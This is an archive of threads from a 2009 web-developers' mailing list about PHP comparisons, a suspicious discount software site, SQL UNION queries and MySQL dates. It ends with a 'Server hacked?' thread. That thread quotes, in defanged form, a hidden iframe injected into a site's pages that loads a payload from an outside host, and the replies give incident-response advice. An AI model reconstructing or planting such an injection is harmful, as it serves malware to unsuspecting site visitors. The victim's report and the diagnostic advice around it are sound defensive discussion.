based on page being displayed In-Reply-To: <7.0.1.0.2.20090708095115.02a19d48@bellsouth.net> References: <7.0.1.0.2.20090708095115.02a19d48@bellsouth.net> Message-ID: <4A54B0D9.2090306@dottedi.biz> matt1027 wrote: > At 01:12 AM 7/8/2009, you wrote: > >>> So I tried changing the !== >>> and the != to just = but that didn't work. >>> >> Checking for equality is == (two equals signs [and sometimes three]), >> not = (one equals sign). >> > > > Thank you for the clarifying that. It still doesn't work and I think > it must be something about the way PHP in the WordPress is working > with Apache to specify what the PHP_SELF or SCRIPT_NAME is. > > In case anyone sees this message without the original, both of the > following work just fine with my regular website but I haven't been > able to get them to work with a WordPress blog. > > >> >> >> >> Whether you're writing custom CMS or in my case, working with Joomla, you can commonly set up a test against the ID or filename itself. I am not sure about PHP_SELF and how Wordpress works in this case. If I need to add a custom JavaScript or CSS element (perhaps in the head) to only the about page or several pages, I set up an include file and if it passes the test, the text is included. You can do similar to exclude opening and closing
elements.
left column etc
These tests work with != and == rather than !== (three) which I didn't know about. I will do this in the function that creates the index.php and occasionally locate and write to the module construct itself. This might not be what you're asking. -- Bob From pturmel-webdev at turmel.org Wed Jul 8 10:36:33 2009 From: pturmel-webdev at turmel.org (Phil Turmel) Date: Wed, 08 Jul 2009 11:36:33 -0400 Subject: [thelist] Cheap Software In-Reply-To: <95F8348C434842B2B531C639DC541D97@DEV> References: <95F8348C434842B2B531C639DC541D97@DEV> Message-ID: <4A54BD01.2060703@turmel.org> Sales @ Lycosa wrote: > In an effort to save money in these troubled times, I have found a website > that sells cheap software, and I wanted to check it out with you guys first. > Has anyone used www.oemlibrary.com and if so, > is it legitimate, or has anyone been burned? > > > Thanks, > > Phil Parker > Hi Phil, Their FAQ page is wishy-washy on whether any specific package can be registered/activated, and indicates that such notes are buried inside the download you've bought. They have phone sales, and e-mail tech support. There is no mailing address or corporate identity displayed. They say their download servers are in the US and Europe, but don't claim to be located there themselves. Their FAQ also mentions that their e-mail is often classified as junk by Yahoo and MSN. Kinda strange for a Microsoft Gold Partner. Hmmm. Looking closer, you find that their webserver's IP address is in Maylasia. Their domain is registered to a Chinese firm (Hong Kong, to be specific) that has an e-mail server but no website. They farm out their e-mail server operations to another company in Xiamen City, China, whose admin contact is an employee of China Telecom. I also noticed that their domain was first registered on May 18th of this year, even though they claim to have been in business since 2003. I googled for independent reviews and found nothing (in english). Please let us know if you get burned or not, so there'll be at least one review. HTH, Phil Turmel -- Need to contact me offlist? Drop -webdev or you probably won't get through. From lee.kowalkowski at googlemail.com Wed Jul 8 08:43:41 2009 From: lee.kowalkowski at googlemail.com (Lee Kowalkowski) Date: Wed, 8 Jul 2009 14:43:41 +0100 Subject: [thelist] [javaScript] removing values from forms In-Reply-To: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> References: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> Message-ID: <610592c90907080643u5a239517scb4829383083d996@mail.gmail.com> 2009/7/8 Tris : > I'm trying to clear an input box is the default value is not changed.. > Here's what I've got and can't figure why it's not working...? > Thoughts...? > > ?function clearBox(inputName, inputDisplay) { > ? ?if (document.addUser.inputName.value = inputDisplay) { > ? ? ?document.addUser.inputName.value = ''; > ? ?} > ?} I think it should be document.addUser[inputName].value - and the condition should have == (potentially === to keep it strict, but certainly not one = by itself). -- Lee www.webdeavour.co.uk From hassan.schroeder at gmail.com Wed Jul 8 12:48:27 2009 From: hassan.schroeder at gmail.com (Hassan Schroeder) Date: Wed, 8 Jul 2009 10:48:27 -0700 Subject: [thelist] Cheap Software In-Reply-To: <95F8348C434842B2B531C639DC541D97@DEV> References: <95F8348C434842B2B531C639DC541D97@DEV> Message-ID: <4eedb92a0907081048m5c47faabm82a71d338f9b8a3e@mail.gmail.com> On Wed, Jul 8, 2009 at 5:48 AM, Sales @ Lycosa wrote: > In an effort to save money in these troubled times, I have found a website > that sells cheap software... Personally I love seeing people whose business model is "we lose money on every sale but we make it up in volume". Of course, ya know, if it sounds too good to be true, well... :-) -- Hassan Schroeder ------------------------ hassan.schroeder at gmail.com twitter: @hassan From sales at lycosa.co.uk Wed Jul 8 13:22:27 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Wed, 8 Jul 2009 19:22:27 +0100 Subject: [thelist] Cheap Software In-Reply-To: <4eedb92a0907081048m5c47faabm82a71d338f9b8a3e@mail.gmail.com> Message-ID: > Of course, ya know, if it sounds too good to be true, well... :-) Precisely, false economy, especially if it doesn't work... From sales at lycosa.co.uk Wed Jul 8 13:56:42 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Wed, 8 Jul 2009 19:56:42 +0100 Subject: [thelist] Cheap Software In-Reply-To: <4A54BD01.2060703@turmel.org> Message-ID: <2957FAF142F945BDB2D7675D49B3A10A@DEV> Nice investigation, Phil. I hadn't got that far yet, so thanks for that. > Their FAQ also mentions that their e-mail is often classified as junk by Yahoo and MSN. Kinda strange for a Microsoft Gold Partner. Hmmm. Precisely my thoughts. I tried to find a list of certified Adobe partners, but I couldn't find one. If anyone knows of this list, I would be interested to see it. >Please let us know if you get burned or not, so there'll be at least one review. Hey thanks... >From the information you have gathered, I suspect this site could easily be a front for fraud and identity theft, so I am going to contact Adobe and see what they have to say on the matter. Phil From sales at lycosa.co.uk Wed Jul 8 14:59:44 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Wed, 8 Jul 2009 20:59:44 +0100 Subject: [thelist] Cheap Software In-Reply-To: <2957FAF142F945BDB2D7675D49B3A10A@DEV> Message-ID: <16AA5976CFB548ED92F89F93F00750A8@DEV> http://cheap-adobe.com/ appears to be a clone site, with exactly the same sales pitch. Domain registered Dec 2008. From jason.handby at corestar.co.uk Wed Jul 8 09:24:14 2009 From: jason.handby at corestar.co.uk (Jason Handby) Date: Wed, 8 Jul 2009 15:24:14 +0100 Subject: [thelist] Cheap Software In-Reply-To: <95F8348C434842B2B531C639DC541D97@DEV> References: <95F8348C434842B2B531C639DC541D97@DEV> Message-ID: <9A50776858A21848A96469CDFCBCDEFF025544EC@exch-be12.exchange.local> Hi Phil, > In an effort to save money in these troubled times, I have found a > website > that sells cheap software, and I wanted to check it out with you guys > first. > Has anyone used www.oemlibrary.com and if > so, > is it legitimate, or has anyone been burned? My first instinct is one of deep scepticism that they could be legally selling it this cheaply. It appears from their FAQ page that they're selling software licenses previously owned by companies that have gone out of business. Sounds reasonable, but software licenses can't just be sold on like office furniture. Some companies' software license agreements specifically state that the license is non-transferable, or can only be transferred under certain conditions, so you may not be legally licensed if you buy it from them. Their FAQ says that you won't be able to register "your" software online with the manufacturer. They also say "All updates (for most of the software) are available for you", and that you can "almost always" download software updates from the manufacturer's website. That doesn't sound very reassuring to me either! Oh -- and check this out. The domain is registered to a Hong Kong company called "Absolutee Corp. Ltd": http://www.whois.net/whois/oemlibrary.com A quick google suggests they are linked to a fake shipping company: http://db.aa419.org/fakebanksview.php?key=20064 a gmail phishing scam: http://mybroadband.co.za/vb/showthread.php?t=84831 and a child pr0n payment processor: http://www.matchent.com/wpress/?q=node/369 That may help you decide whether you want to give them your payment details ;-) Jason From sales at lycosa.co.uk Wed Jul 8 17:14:13 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Wed, 8 Jul 2009 23:14:13 +0100 Subject: [thelist] Cheap Software In-Reply-To: <9A50776858A21848A96469CDFCBCDEFF025544EC@exch-be12.exchange.local> Message-ID: <7C2CCCF5BE2E4D1AB16F338282025976@DEV> Thanks, Jason. > My first instinct is one of deep scepticism that they could be legally selling it this cheaply. Absolutely, my gut feeling, too. That was my reason for checking it out with you guys. > That may help you decide whether you want to give them your payment details ;-) As I suspected, it is obviously criminal. [run away, run away :)] From eccentric.one at gmail.com Thu Jul 9 00:01:36 2009 From: eccentric.one at gmail.com (Jeremy Weiss) Date: Thu, 9 Jul 2009 00:01:36 -0500 Subject: [thelist] can / should this be done in SQL? Message-ID: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> Working with PHP/MySQL I have a query that pulls the 12 most recent records from a news table. The client has decided that too many of those records are of one type so she now wants it to pull: 4 most recent records from category 1 3 most recent records from category 2 3 most recent records from category 3 2 most recent records from category 4 Now, I could just run 4 queries and then use PHP to merge the results into an array and sort the array based on date. But I'm curious if there's a way to do this in a single SQL query that I'm overlooking. I tried: SELECT * FROM news WHERE category = 1 ORDER BY date DESC LIMIT 4 UNION SELECT * FROM news WHERE category = 2 ORDER BY date DESC LIMIT 3 UNION SELECT * FROM news WHERE category = 6 ORDER BY date DESC LIMIT 3 UNION SELECT * FROM news WHERE category = 3 ORDER BY date DESC LIMIT 2 Which gives me an error 'Incorrect usage of UNION and ORDER BY' as it should. I've also tried various versions of subselects to no avail. Again, this one's not mission critical, just trying to push my SQL limits a bit. -jeremy From dan.p.burke at gmail.com Thu Jul 9 01:30:04 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Thu, 9 Jul 2009 16:00:04 +0930 Subject: [thelist] can / should this be done in SQL? In-Reply-To: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> References: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> Message-ID: select * from ( SELECT * FROM news WHERE category = 1 LIMIT 4 UNION SELECT * FROM news WHERE category = 2 LIMIT 3 UNION SELECT * FROM news WHERE category = 6 LIMIT 3 UNION SELECT * FROM news WHERE category = 3 LIMIT 2 ) order by date desc If I was planning on supporting a poor imlementation of SQL, for example MySQL*, I would do this in PHP. Otherwise SQL all the way. Not a good way to do it if you're planning of having this scale to multiple servers, although at that point you will know better ways to do it. * MySQL may or may not support this kind of stuff, but I still remember when it didn't do transactions, my opinion is tainted. regards, dan -- "It's your privilege as an artist to inflict the pain of creativity on yourself." --Programming Perl 3rd Edition, end of first chapter. On Thu, Jul 9, 2009 at 2:31 PM, Jeremy Weiss wrote: > Working with PHP/MySQL > > I have a query that pulls the 12 most recent records from a news table. The > client has decided that too many of those records are of one type so she now > wants it to pull: > 4 most recent records from category 1 > 3 most recent records from category 2 > 3 most recent records from category 3 > 2 most recent records from category 4 > > Now, I could just run 4 queries and then use PHP to merge the results into > an array and sort the array based on date. But I'm curious if there's a way > to do this in a single SQL query that I'm overlooking. > > I tried: > > SELECT * FROM news WHERE category = 1 ORDER BY date DESC LIMIT 4 > UNION > SELECT * FROM news WHERE category = 2 ORDER BY date DESC LIMIT 3 > UNION > SELECT * FROM news WHERE category = 6 ORDER BY date DESC LIMIT 3 > UNION > SELECT * FROM news WHERE category = 3 ORDER BY date DESC LIMIT 2 > > Which gives me an error 'Incorrect usage of UNION and ORDER BY' as it > should. I've also tried various versions of subselects to no avail. > > Again, this one's not mission critical, just trying to push my SQL limits a > bit. > > -jeremy > > > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From Ed at ComSimplicity.com Thu Jul 9 00:22:31 2009 From: Ed at ComSimplicity.com (Edward McCarroll) Date: Wed, 8 Jul 2009 22:22:31 -0700 Subject: [thelist] can / should this be done in SQL? In-Reply-To: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> References: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> Message-ID: I don't know about MySQL, but I've actually used the following in MS SQL Server: select top 2 * from ActivityOrganizer where OrganizerTypeId = 1 union select top 3 * from ActivityOrganizer where OrganizerTypeId = 4 union select top 5 * from ActivityOrganizer where OrganizerTypeId = 9 order by ActivityId The "order by" comes last because it applies to the entire union. Regards, Ed "Expletive Deleted!" (Richard M. Nixon) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Ed McCarroll Ed at ComSimplicity.com PO Box 654 (310) 904-3651 Culver City, CA 90232 www.ComSimplicity.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - > I tried: > > SELECT * FROM news WHERE category = 1 ORDER BY date DESC LIMIT 4 > UNION > SELECT * FROM news WHERE category = 2 ORDER BY date DESC LIMIT 3 > UNION > SELECT * FROM news WHERE category = 6 ORDER BY date DESC LIMIT 3 > UNION > SELECT * FROM news WHERE category = 3 ORDER BY date DESC LIMIT 2 > > Which gives me an error 'Incorrect usage of UNION and ORDER BY' From Joel at BizBa6.com Thu Jul 9 02:09:54 2009 From: Joel at BizBa6.com (Joel D Canfield) Date: Thu, 9 Jul 2009 00:09:54 -0700 Subject: [thelist] can / should this be done in SQL? References: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> Message-ID: <72E9FAA171D63B48AAC707C72900E6B4021F93B6@ireland.spinhead.com> > select * from ( > SELECT * FROM news WHERE category = 1 LIMIT 4 > UNION > SELECT * FROM news WHERE category = 2 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 6 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 3 LIMIT 2 > ) order by date desc doesn't that just sort the results, returning whichever records happen to come first in each category? joel From jason.handby at corestar.co.uk Thu Jul 9 02:12:43 2009 From: jason.handby at corestar.co.uk (Jason Handby) Date: Thu, 9 Jul 2009 08:12:43 +0100 Subject: [thelist] can / should this be done in SQL? In-Reply-To: References: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> Message-ID: <9A50776858A21848A96469CDFCBCDEFF0255455E@exch-be12.exchange.local> > select * from ( > SELECT * FROM news WHERE category = 1 LIMIT 4 > UNION > SELECT * FROM news WHERE category = 2 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 6 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 3 LIMIT 2 > ) order by date desc Unfortunately this won't do what Jeremy wants, as the records selected for each category may not be the most recent ones. In MSSQL you'd do this: SELECT * FROM (SELECT TOP 4 * FROM news WHERE category=1 ORDER BY date DESC) t1 UNION SELECT * FROM (SELECT TOP 4 * FROM news WHERE category=2 ORDER BY date DESC) t2 UNION SELECT * FROM (SELECT TOP 4 * FROM news WHERE category=6 ORDER BY date DESC) t3 UNION SELECT * FROM (SELECT TOP 4 * FROM news WHERE category=3 ORDER BY date DESC) t4 ORDER BY date DESC I don't have MySQL to hand, but I'd guess if you change the "TOP" syntax to "....LIMIT" then it should work? > * MySQL may or may not support this kind of stuff, but I still > remember when it didn't do transactions, my opinion is tainted. I'm looking forward to an inbox full of MySQL evangelism today then ;-) Jason From nan at nanharbison.com Wed Jul 8 05:31:01 2009 From: nan at nanharbison.com (Nan Harbison) Date: Wed, 8 Jul 2009 06:31:01 -0400 Subject: [thelist] simple question about comparing dates in PHP/MySQL In-Reply-To: <8C6E5750E81147F785C15E5BEE6CAFEB@curly> References: <8C6E5750E81147F785C15E5BEE6CAFEB@curly> Message-ID: <8663F69936F94CDB90A5176915434D61@nancyb0bda4ba6> Thanks Rudy! I had come to this conclusion over time (by trial and error) because it didn't seem to work, but I had no proof. I find the whole date and time thing in databases a little confusing sometimes. I am sure I will quote you on this! Nan -----Original Message----- From: thelist-bounces at lists.evolt.org [mailto:thelist-bounces at lists.evolt.org] On Behalf Of r937 Sent: Tuesday, July 07, 2009 10:48 PM To: thelist at lists.evolt.org Subject: [thelist] simple question about comparing dates in PHP/MySQL > This might be a stupid question, but someone was trying to tell me > that you can compare dates in the format: 2009-06-04 > 2009-05-30. that is false as written, those are arithmetic expressions, not dates 2009-06-04 evaluates to the integer 1999, while 2009-05-30 evaluates to the integer 1974 clearly, not what was intended written as date strings, however, yes, you can compare them meaningfully '2009-06-04' > '2009-05-30' see the difference? by the way, lee, mysql does not require date strings to zero-pad the month or day furthermore, mysql will recognize any character as the year/month/day separator, so all of the following are valid dates -- '2009-05-30' '2009-5-30' '2009/05/30' '2009.5.30' '2009?05?30' rudy http://simply-sql.com/ -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! From eccentric.one at gmail.com Thu Jul 9 12:39:12 2009 From: eccentric.one at gmail.com (Jeremy Weiss) Date: Thu, 9 Jul 2009 12:39:12 -0500 Subject: [thelist] can / should this be done in SQL? In-Reply-To: <9A50776858A21848A96469CDFCBCDEFF0255455E@exch-be12.exchange.local> References: <4a5579bf.07015a0a.1121.fffff9dc@mx.google.com> <9A50776858A21848A96469CDFCBCDEFF0255455E@exch-be12.exchange.local> Message-ID: <4a562b52.20015a0a.1d0d.4728@mx.google.com> For the sake of TheList archives (and the fact I feel like rambling), let me step through this a bit: 2009/07/09 - Daniel Burke > select * from ( > SELECT * FROM news WHERE category = 1 LIMIT 4 > UNION > SELECT * FROM news WHERE category = 2 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 6 LIMIT 3 > UNION > SELECT * FROM news WHERE category = 3 LIMIT 2 > ) order by date desc Firstly, there's a minor syntax error. As Rudy explained in his Simply SQL book, "In standard SQL, the UNION query must be given a table alias." Used as is, MySQL gives the following error: "Every derived table must have its own alias." Again, very minor issue. As others had pointed out, the above doesn't always give the 2 most recent records. As Ed stated in his email, the ORDER BY applies to the entire UNION, not the subselects. What no one mentioned though, is that it only returns 2 records, not 12. I'm not sure if this is standard SQL or a MySQL idiosyncrasy. And to make it even more interesting, the returned records are from the first subselect statement. > 2009/07/09 - Jason Handby > > I don't have MySQL to hand, but I'd guess if you change the "TOP" syntax > to "....LIMIT" then it should work? > Correct you are Jason. And now I'm kicking myself as one of my attempts was oh so close. Here's the MySQL-ized version of Jason's MS SQL query: SELECT * FROM (SELECT * FROM news WHERE category=1 ORDER BY date DESC LIMIT 4) t1 UNION SELECT * FROM (SELECT * FROM news WHERE category=2 ORDER BY date DESC LIMIT 3) t2 UNION SELECT * FROM (SELECT * FROM news WHERE category=6 ORDER BY date DESC LIMIT 3) t3 UNION SELECT * FROM (SELECT * FROM news WHERE category=3 ORDER BY date DESC LIMIT 2) t4 ORDER BY date DESC Big thanks to everyone for the help. -jeremy From kmulvihill at ca.rr.com Thu Jul 9 13:28:25 2009 From: kmulvihill at ca.rr.com (Kevin Mulvihill) Date: Thu, 09 Jul 2009 11:28:25 -0700 Subject: [thelist] Cheap Software In-Reply-To: <16AA5976CFB548ED92F89F93F00750A8@DEV> Message-ID: I've already reported the site to Adobe, and they were eager to have the referral. I suggest NOT buying anything from this site. Kevin On 7/8/09 12:59 PM, "Sales @ Lycosa" wrote: > http://cheap-adobe.com/ appears to be a clone site, with exactly the same > sales pitch. Domain registered Dec 2008. From sales at lycosa.co.uk Thu Jul 9 16:55:31 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Thu, 9 Jul 2009 22:55:31 +0100 Subject: [thelist] Cheap Software In-Reply-To: Message-ID: <3436D79A3C4F42AC8FB34D1E610D15FC@DEV> >I've already reported the site to Adobe, and they were eager to have the referral. I suggest NOT buying anything from this site. Sterling work Kevin, thanks. And I won't be buying from them. Hopefully this thread will have achieved something worthwhile :) Phil From steveax at pobox.com Thu Jul 9 17:40:44 2009 From: steveax at pobox.com (Steve Axthelm) Date: Thu, 9 Jul 2009 15:40:44 -0700 Subject: [thelist] Cheap Software In-Reply-To: <95F8348C434842B2B531C639DC541D97@DEV> Message-ID: On 2009-07-08 Sales @ Lycosa wrote: >In an effort to save money in these troubled times, I have found a >website that sells cheap software, and I wanted to check it out with >you guys first. Has anyone used [snip] You realize that you are giving publicity and links (via web archives of this list) to these folks, yes? If you think they (and the "clone" site you linked to) are shady (and yes, if it sounds too good to be true...), why on earth would you continue to include the links to these sites? Please folks, if you respond to this thread, remove the links to the sites. Cheers, -Steve -- Steve Axthelm steveax at pobox.com From sales at lycosa.co.uk Fri Jul 10 04:39:49 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Fri, 10 Jul 2009 10:39:49 +0100 Subject: [thelist] Cheap Software In-Reply-To: Message-ID: <980EECFCA4584A36B89E89FC2C30C679@DEV> > Please folks, if you respond to this thread, remove the links to the sites. Valid point, Steve, thanks. That will certainly be a consideration in my future posts. Phil From sales at lycosa.co.uk Fri Jul 10 04:42:17 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Fri, 10 Jul 2009 10:42:17 +0100 Subject: [thelist] Server hacked? Message-ID: <2A24C94CC008463F91879A05B3FB1E8E@DEV> Hi, I just had a scary moment, and I thought my server had been compromised. It turns out that just one site had been compromised, with the injection of the following code into all the index pages within each directory of the site. (I have added spaces to prevent the link delivering its payload). i_f_r_a_m_e s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 " width=125 height=125 style="visibility: hidden" The site runs cube cart, and I suspect a Trojan was somehow added to the review pages of the site. No passwords were altered, so I am assuming this is the work of a script. I take the security of my servers very seriously, and I take steps to maintain their integrity, but this is a new one for me. Also, according to my customer, his site has been listed as dangerous with Google. My question is this: how did a script infect my server without a username/password, and how do I prevent this happening again? [ I have researched Google, and sent a support ticket to my hosting company, but nothing yet ] Thanks. Phil Parker Kind regards, Phil Parker Lycosa Web Services Ltd, 47 Hilderthorpe Road, Bridlington, East Yorkshire. YO15 3AZ. Tel: 01262 42 42 99 Email: sales at lycosa.co.uk Web: http://www.lycosa.co.uk Registered in England and Wales company no. 04614248 ------------------------------------------------------------------------ WEB DESIGN - ECOMMERCE SOLUTIONS - WEB PROMOTION ------------------------------------------------------------------------ Disclaimer: The information in this email is confidential and is intended solely for the use of the addressee. If you are not the intended recipient of this email you have received it in error and any disclosure, copying or distribution is strictly prohibited. Any quotation or estimate is valid for 30 days from the date of this email. E. & O. E. From dan.p.burke at gmail.com Fri Jul 10 05:38:09 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Fri, 10 Jul 2009 20:08:09 +0930 Subject: [thelist] Server hacked? In-Reply-To: <2A24C94CC008463F91879A05B3FB1E8E@DEV> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> Message-ID: This is something I'm pretty sure you're going to have to figure out yourself. There are a number of ways of doing this, personally I would do this... Determine when it was compromised (to the millisecond if possible). Start comparing your backups (you have lots of them don't you?). If the hack is really lame the timestamps on the files will reflect the hack attempt. I wouldn't bet on it. Now that you know the time of the hack analyse the logs for the suspect time period. You have very detailed logs going back at least a month right? If that doesn't help, consider the possible points of entry, in order of least to most likely... 1. Vulnerability in a network service you are running 2. Vulnerability in PHP. 3. Vulnerability in your server configuration. 4. Vulnerability in cube cart. 5. Vulnerability in your php code. 6. Password was compromised through a keylogger. Points 1 and 2 can be (almost) ruled out after you have diffed your backups and verified that this site is the only part that has changed. PHP is a very popular language, it has attracted a lot of people, most of whom should not be writing code. A significant portion of PHP programmers are new to programming and don't understand everything involved. Most people when they've been using PHP for a while will move onto a different language, one that doesn't have so many way to shoot yourself in the foot or several functions that do the exact same thing. (or as I have a language that allows you to blow off your whole leg, and most of the town you're living in, see sig). The point I'm trying to make is, PHP is the VB of web-servers. Consider anything-PHP to be highly suspect, unless you wrote it yourself, and you've been doing it for at least 3 years with a strong eye on security. And even then I'd be suspicious. I'll bet your client got a keylogger on their machine. Check your logs, listen to the hornets nest that I no doubt have stirred up with this reply. There are a lot of folks on this list that know an awful lot more about this stuff than I. If you haven't already, consider checking out some of the hardened versions of PHP for the future. As a "programmable hypertext preprocessor" PHP can do way too much stuff that is a total security risk. Securing PHP is a book in itself. regards, dan -- "It's your privilege as an artist to inflict the pain of creativity on yourself." --Programming Perl 3rd Edition, end of first chapter. On Fri, Jul 10, 2009 at 7:12 PM, Sales @ Lycosa wrote: > Hi, I just had a scary moment, and I thought my server had been compromised. > It turns out that just one site had been compromised, with the injection of > the following code into all the index pages within each directory of the > site. (I have added spaces to prevent the link delivering its payload). > > > > i_f_r_a_m_e ?s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 " > width=125 height=125 style="visibility: hidden" > > > > The site runs cube cart, and I suspect a Trojan was somehow added to the > review pages of the site. No passwords were altered, so I am assuming this > is the work of a script. I take the security of my servers very seriously, > and I take steps to maintain their integrity, but this is a new one for me. > Also, according to my customer, his site has been listed as dangerous with > Google. > > > > My question is this: how did a script infect my server without a > username/password, and how do I prevent this happening again? > > > > [ I have researched Google, and sent a support ticket to my hosting company, > but nothing yet ] > > > > Thanks. > > > > Phil Parker > > > > > > Kind regards, > > Phil Parker > > > Lycosa Web Services Ltd, > 47 Hilderthorpe Road, > Bridlington, > East Yorkshire. > YO15 3AZ. > > Tel: 01262 42 42 99 > Email: ? sales at lycosa.co.uk > Web: ? http://www.lycosa.co.uk > > Registered in England and Wales company no. 04614248 > ------------------------------------------------------------------------ > WEB DESIGN - ECOMMERCE SOLUTIONS - WEB PROMOTION > ------------------------------------------------------------------------ > Disclaimer: The information in this email is confidential and is intended > solely for the use of the addressee. If you are not the intended recipient > of this email you have received it in error and any disclosure, copying or > distribution is strictly prohibited. > Any quotation or estimate is valid for 30 days from the date of this email. > > E. & O. E. > > > > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From sarahwbs at gmail.com Fri Jul 10 08:07:13 2009 From: sarahwbs at gmail.com (Sarah Adams) Date: Fri, 10 Jul 2009 10:07:13 -0300 Subject: [thelist] Server hacked? In-Reply-To: References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> Message-ID: <4A573D01.5050507@gmail.com> > Most people when they've been using PHP for a while will > move onto a different language, one that doesn't have so many way to > shoot yourself in the foot or several functions that do the exact same > thing. (or as I have a language that allows you to blow off your whole > leg, and most of the town you're living in, see sig). > > The point I'm trying to make is, PHP is the VB of web-servers. > Consider anything-PHP to be highly suspect, unless you wrote it > yourself, and you've been doing it for at least 3 years with a strong > eye on security. And even then I'd be suspicious. Might I ask, since you've done such a bang up job of slamming PHP, what programming language you prefer for the web? -- sarah adams web developer & programmer http://sarah.designshift.com From dan.p.burke at gmail.com Fri Jul 10 09:59:05 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Sat, 11 Jul 2009 00:29:05 +0930 Subject: [thelist] Server hacked? In-Reply-To: <4A573D01.5050507@gmail.com> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> <4A573D01.5050507@gmail.com> Message-ID: It's not the language I was slamming, but a large portion of it's users. It tries to cater to the lowest common denominator. The lowest common denominator shouldn't be writing financial applications that are accessible on the web. I'm not saying get rid of PHP, just that if someone has PHP as the only language on their resume, then you should think twice before asking them to write a payment system. And I have seen a lot of code written by these people. Examples feature regularly on thedailywtf.com On Fri, Jul 10, 2009 at 10:37 PM, Sarah Adams wrote: >> Most people when they've been using PHP for a while will >> move onto a different language, one that doesn't have so many way to >> shoot yourself in the foot or several functions that do the exact same >> thing. (or as I have a language that allows you to blow off your whole >> leg, and most of the town you're living in, see sig). >> >> The point I'm trying to make is, PHP is the VB of web-servers. >> Consider anything-PHP to be highly suspect, unless you wrote it >> yourself, and you've been doing it for at least 3 years with a strong >> eye on security. And even then I'd be suspicious. > > Might I ask, since you've done such a bang up job of slamming PHP, what > programming language you prefer for the web? > > -- > sarah adams > web developer & programmer > http://sarah.designshift.com > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From brundlefly at gmail.com Fri Jul 10 10:55:05 2009 From: brundlefly at gmail.com (Shannon Hubbell) Date: Fri, 10 Jul 2009 08:55:05 -0700 Subject: [thelist] Server hacked? In-Reply-To: <2A24C94CC008463F91879A05B3FB1E8E@DEV> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> Message-ID: <43fee5d00907100855l68c9bc04wa36b1e66cce6b77f@mail.gmail.com> Are you using FTP? http://www.eweek.com/c/a/Security/Trojan-Swipes-FTP-Credentials-for-Major-Companies-in-Malware-Attack-340752/ On Fri, Jul 10, 2009 at 2:42 AM, Sales @ Lycosa wrote: > Hi, I just had a scary moment, and I thought my server had been > compromised. > It turns out that just one site had been compromised, with the injection of > the following code into all the index pages within each directory of the > site. (I have added spaces to prevent the link delivering its payload). > > > > i_f_r_a_m_e s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 " > width=125 height=125 style="visibility: hidden" > > > > The site runs cube cart, and I suspect a Trojan was somehow added to the > review pages of the site. No passwords were altered, so I am assuming this > is the work of a script. I take the security of my servers very seriously, > and I take steps to maintain their integrity, but this is a new one for me. > Also, according to my customer, his site has been listed as dangerous with > Google. > > > > My question is this: how did a script infect my server without a > username/password, and how do I prevent this happening again? > > > > [ I have researched Google, and sent a support ticket to my hosting > company, > but nothing yet ] > > > > Thanks. > > > > Phil Parker > > > > > > Kind regards, > > Phil Parker > > > Lycosa Web Services Ltd, > 47 Hilderthorpe Road, > Bridlington, > East Yorkshire. > YO15 3AZ. > > Tel: 01262 42 42 99 > Email: sales at lycosa.co.uk > Web: http://www.lycosa.co.uk > > Registered in England and Wales company no. 04614248 > ------------------------------------------------------------------------ > WEB DESIGN - ECOMMERCE SOLUTIONS - WEB PROMOTION > ------------------------------------------------------------------------ > Disclaimer: The information in this email is confidential and is intended > solely for the use of the addressee. If you are not the intended recipient > of this email you have received it in error and any disclosure, copying or > distribution is strictly prohibited. > Any quotation or estimate is valid for 30 days from the date of this email. > > E. & O. E. > > > > -- > > * * Please support the community that supports you. * * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From moseley at hank.org Fri Jul 10 11:06:29 2009 From: moseley at hank.org (Bill Moseley) Date: Fri, 10 Jul 2009 09:06:29 -0700 Subject: [thelist] Server hacked? In-Reply-To: <43fee5d00907100855l68c9bc04wa36b1e66cce6b77f@mail.gmail.com> References: <2A24C94CC008463F91879A05B3FB1E8E@DEV> 